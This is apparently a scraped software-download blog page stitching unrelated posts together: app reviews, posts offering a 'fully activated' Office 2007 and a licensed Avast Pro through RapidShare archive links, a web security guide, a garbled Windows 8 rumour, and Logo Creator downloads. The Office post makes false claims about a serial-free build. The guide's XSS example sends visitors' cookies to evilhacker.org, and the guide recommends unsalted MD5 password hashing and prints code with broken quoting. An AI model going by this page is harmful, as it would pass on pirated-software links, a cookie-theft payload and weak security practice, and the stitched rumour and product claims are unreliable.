Find out which files and folders are eating up hard drive space

How is it possible that the 1TB hard drive you bought a few months ago is already running out of free space? Find the answer with Disk Space Fan!

This simple tool analyzes your hard drive in just a few seconds and then displays its contents in a colorful, interactive pie chart. Clicking the different areas in this chart lets you browse files and folders until you discover which ones are eating all the space.

Disk Space Fan works fine. It does what it says on the tin, takes just a few seconds to scan the whole disk and uses really attractive charts. Disk Space Fan is also very easy to use – in fact it doesn’t have any configuration options.

On the downside, Disk Space Fan lacks advanced features that you find in other similar tools, such as exporting the scan results to a file, and analyzing networked devices or external devices.

Disk Space Fan is a visually appealing disk space analyzer that helps you find the largest folders and files on your hard drive.


Minimum requirements:
* .NET Framework 2.0

Languages:
English

OS requirements for Disk Space Fan:
* OS: WinXP/Vista/7

Firefox with a Vista-aero Theme

If there’s something positive about Vista, that’s its visual appearance. The Aero style, packed with jaw-dropping 3D effects and transparent windows, makes an eye-catching operating system. And now you can add that style to Firefox too!

Simply install this theme and select it from the Tools – Add-ons menu, and you’ll tweak the browser’s interface so that it perfectly matches the Vista design. In fact, the skin uses IE7 buttons, which I must admit suits Firefox well. However, I didn’t like having all those extra Favorite buttons on the tab bar and not being able to remove them.

Needless to say, you can use this theme even if you don’t have Vista, but it doesn’t look quite as nice.
Languages:

English
OS requirements for Vista-aero Theme:
* OS: Win98/98SE/Me/2000/NT/XP/2003/Vista
Minimum requirements:
* Firefox 3.6 – 3.7a1pre

Convert, divide and combine video files with TubeHunter Media Center 4.1

TubeHunter Media Center is a complete media suite that meets all your conversion needs. It supports all popular formats and can also work with DVD and iPod.

When launching TubeHunter Media Center you’ll be presented with a nice, green interface from where you can access the program’s different tools. Each of them work as an independent app and run separately from the main interface – something that may please some users, but which I find a bit uncomfortable.

Strangely enough, the apps included in TubeHunter Media Center don’t share the same look and feel as the starting window. Instead of having a smooth, green skin, they display a gray, blocky style that seems to have been directly imported from Windows 3.1.

This weird look, together with the surprising lack of preview window and an annoying registration message that pops up every time you use the program make the whole TubeHunter Media Center experience a rather unpleasant one.

TubeHunter Media Center does support lots of formats for video conversion, but fails to provide a decent working environment.
Languages:

English
TubeHunter Media Center supports the following formats:

FLV, SWF, AVI, MPEG, DivX, XviD, MP4, M4A, MP3, 3G2, DVD, MOV
Limitations:

* The trial version converts or rips a maximum of 300 seconds in DVD Ripper, Video Converter and Video to iPod; it converts a maximum of 20 pictures in Video to Images; and it rips a maximum of 30 seconds of each song in CD to MP3.

OS requirements for TubeHunter Media Center:

* OS: WinXP/Vista/7

Microsoft Office 2007 – Blue Edition Full Activated

This is the copy from the original disk, which is (as said before) only accessible to technicians of Microsoft. This version of Microsoft Office 2007 will never appear for sale, since this is the only version where there is no need for a serial. This version also doesn’t need an activation. The installer is very simple, undetailed and handy. The interface of application is completely changed, it is modernized and practically reminds in no way to the previous versions.In a few minutes the software will be installed on your computer, without any questions or other things that slow down the installation.
Office Enterprise 2007 is the most complete Microsoft toolset provided for people who must collaborate with others and work with information efficiently, regardless of location or network status. Office Enterprise 2007 builds on the strengths of Microsoft Office Professional Plus 2007, adding Microsoft Office Groove 2007 and Microsoft Office OneNote 2007, enabling people to collaborate and create, manage, and use information more efficiently.

Include:
* Microsoft Office Access 2007
* Microsoft Office Excel 2007
* Microsoft Office Groove 2007
* Microsoft Office InfoPath 2007
* Microsoft Office OneNote 2007
* Microsoft Office Outlook 2007
* Microsoft Office PowerPoint 2007
* Microsoft Office Publisher 2007
* Microsoft Office Word 2007

Microsoft Office 2007 comes loaded with a default blue theme , but now they have added two more themes to the theme set. Now it comes with a silver and black theme.

No serial key needed because this version is only available to equipment manufacturers and not to the general public. It updates and is fully working, no need to crack/patch it as well.

http://rapidshare.com/files/342469921/MOB07.part1.rar

http://rapidshare.com/files/342470161/MOB07.part2.rar

http://rapidshare.com/files/342644385/MOB07.part3.rar

http://rapidshare.com/files/342688566/MOB07.part4.rar

http://rapidshare.com/files/342689244/MOB07.part5.rar

http://rapidshare.com/files/342688347/MOB07.part6.rar

Avast Antivirus 5.0.396 Pro + License Till 2011


Avast Pro Antivirus 5.0 is for people and companies that want a customized computer security package. Antivirus and internet protection components in Avast Pro Antivirus are built for easy integration with existing firewalls in users’ home or work computers. Pro Antivirus has two major additions to the core protection elements in Avast Free Antivirus: the Script Engine and the Sandbox.

http://rapidshare.com/files/343888580/Avast__Antivirus_5.0.396_Pro_.rar

Security Best Practices

Treats the security of our users’ personal data very seriously, and we hope that our developers will do the same. Here are some guidelines to help you protect your users’ trust in your application.

Protect Your Servers

The first step in protecting user data is to ensure that your systems are kept current with security patches. If you do not operate your own dedicated servers, then please ask your hosting provider if they keep their systems up-to-date.

  • Ensure you have installed the latest operating system security patches.
  • Keep your web server software up-to-date
  • Limit access from the Internet to your servers. Use firewall software to block access to any port but the following:
    • 80 (HTTP)
    • 443 (HTTPS – only if your application uses it)
    • 22 (SSH)
  • Use SSH/SCP to remotely log in to and copy files to your servers. Telnet and FTP transmit passwords in clear text, making it easier for someone to find out what your password is.
  • Choose a password that is difficult to guess. Hackers routinely use “dictionary attacks” to guess passwords for web servers. Choose a password that mixes upper and lower case letters, numbers, and symbols (“$#@%^&*”).

Protect Your Network

Be sure that the services that are exposed to the Internet are only the ones your users need to access.

  • Place servers that your users do not directly interact with (e.g., a back-end database server) in a private network that is inaccessible from the Internet. If that is not possible, then use firewall software to block access from any computer other than your web server.

Protect Your Application

Most of the cases of user data making its way into the wrong hands stems from application bugs or security holes. Here are some basic guidelines for building safe internet applications:

  • Never store passwords in clear text. Instead, use a hashing algorithm such as MD5 or SHA-256 to create a signature of the user’s password for storage. To authenticate the user, simply apply the same algorithm to the password received from your login page and compare with what you have stored.
  • If you use cookies to identify your users, do not simply store the username in the cookie and rely on that alone to authenticate the request. This is too easy for a hacker to guess or forge. Instead, generate a unique signature for the user based on the login and password and store that in the cookie.
  • Carefully check any parameters you pass to SQL statements in your application. Untreated user input can easily be hijacked to clear out your database. PHP has a function called mysql_real_escape_string() that will prevent most attacks of this type.
  • Purge unused/unnecessary user data from your system regularly. This limits the damage that could be done if an attacker gains control of your system.

Protect Against Request Forgeries

Ensure that requests coming in to your application originated from your application.

Let’s say you have an application that manages a user’s photos. If your application provides a function to delete a user’s photos (e.g., “http://myapp.org/delete_photos.php”), an attacker could embed the same URL into his web page, such as <img src=”http://myapp.org/delete_photos.php”>. If one of your users visited the attacker’s page, your user’s photos would be wiped out.

Here are some ways of ensuring that requests to your application have come from your application:

First, consider whether you can rely on an HTTP POST request rather than a GET. The W3C recommends using POST if the action will cause a change in the resource or data on the server side.

Append a user-specific signature to the end of URLs to your application.

<?php
$delete_signature = md5($username . "xyz123_delete_photos");
?>

<!-- signed link -->

<a href="/delete_photos.php?signature=<?php echo $delete_signature; ?>'>Delete Photos</a>

Before taking any action on behalf of the user, check that the “signature” argument is correct by performing the same hashing operation.

<?php
$delete_signature = md5($username . "xyz123_delete_photos");

if ($_GET['signature'] === $delete_signature) {
// proceed with delete operation
// ...
} else {
// this is a problem
// ...
}
?>

If your development framework supports a user session container (e.g., PHP), then generate a unique signature with a timestamp and store it in the session with each request, and embed it in your forms/URLs so that it is passed back to the server with subsequent requests. Only take action on behalf of the user if the signatures match, and a certain amount of time has not passed.

<?php
$_SESSION['signature'] = md5(uniqid(rand(), true) + $username);
$_SESSION['signature_timestamp'] = time();
?>

<!-- signed link -->
<a href="/delete_photos.php?signature=<?php echo $_SESSION['signature']; ?>'>Delete Photos</a>

<!-- signed form -->
<form method="POST' action="/edit_photos.php'>
<input type="hidden' name="signature' value="<?php echo $_SESSION['signature']; ?>'/>

<input type="text' name="search' />
<input type="submit' />
</form>

Protect Against Cross-Site-Scripting

In cases where you accept input from one user and display it back to another user, you need to ensure the first user cannot steal information from the second user.

For example, if you have a guestbook application where users may enter comments for others to view, an attacker could leave a comment like the following:

Hello Everyone!<script>document.write("<img src="http://evilhacker.org/?" +
document.cookie + "'>);</script>

This example will send a user’s cookies for your site to the server waiting at evilhacker.org. To protect against this kind of attack, check all user input against strictly defined rules about what characters are allowed. Use whitelists (“only allow these characters”) to filter user input. In most cases, the < and > characters do not need to be accepted.

Windows 8 may enter the market already in 2011

A number of Western internet resources appeared unexplained document, which contains new product release schedule for Microsoft. Schedule covers the next few years. From it, in particular, that the client operating system is Windows 8 will be released as early as 1 July 2011. The new OS will be 128-bit, it will support technology clusters, and one-way replication. In addition, it is expected “to radically change access to the files. Does a given phrase emergence of a new file system – is unclear.

Let me remind you: have repeatedly reported that work on Windows 8 is just beginning, and the new system scheduled to be available no earlier than 2012. It should replace Windows 7, which by that time already, as expected, morally obsolete.

In the mysterious document the dates of releases, and other key products of Microsoft. According to these data, 2 July 2012 the software giant should represent the public office suite Office 2012 and of Windows Server 2012. Control system relational database SQL Server 2011 will be announced by July 1, 2011 th, and the server platform of SharePoint Server 2013 and Exchange 2013 package will be presented to customers July 1, 2013.

It is easy to guess, Microsoft officials did not confirm. But do not refute – just silence.

The Logo Creator Mega Pak V5.1

The Logo Creator Mega Pak V5.1

Create professional logo designs that look like a Photoshop guru spent hours laboring over!
The Logo Creator comes in 10 unique Logo Editions! (click on a box to the left to see more info on each set)
Choose from a professional portfolio of logo designs in each set that you can modify and customize yourself… for far less than what a logo design firm will charge.
Mix, match and personalize over 480 professional templates
Import your own artwork, photos and drawings, or use any of the 1500 built in library images!
Sell the logos you create! – That’s right! If you’re a graphics or logo design company, webmaster, small business owner, entrepreneur or service provider … you can sell the logos you create to your own customers!

New features:
The Logo Creator, logo design software is full of modifiable logo designs! Hundreds of possibilities! Thousands actually!
Sell the logo designs you create to your own clients!
Each logo edition comes with a library of logo design templates and logo elements including orbs, swooshes, shapes and glass-like objects!
Import and manipulate your own artwork, photos and clip art images!
…and much more!

Download

Qute:

http://rapidshare.com/files/113863063/The_Logo_Creator_MEGA_Pack_v5.1.part1.rar

http://rapidshare.com/files/113863056/The_Logo_Creator_MEGA_Pack_v5.1.part2.rar

http://rapidshare.com/files/113863057/The_Logo_Creator_MEGA_Pack_v5.1.part3.rar

http://rapidshare.com/files/113863020/The_Logo_Creator_MEGA_Pack_v5.1.part4.rar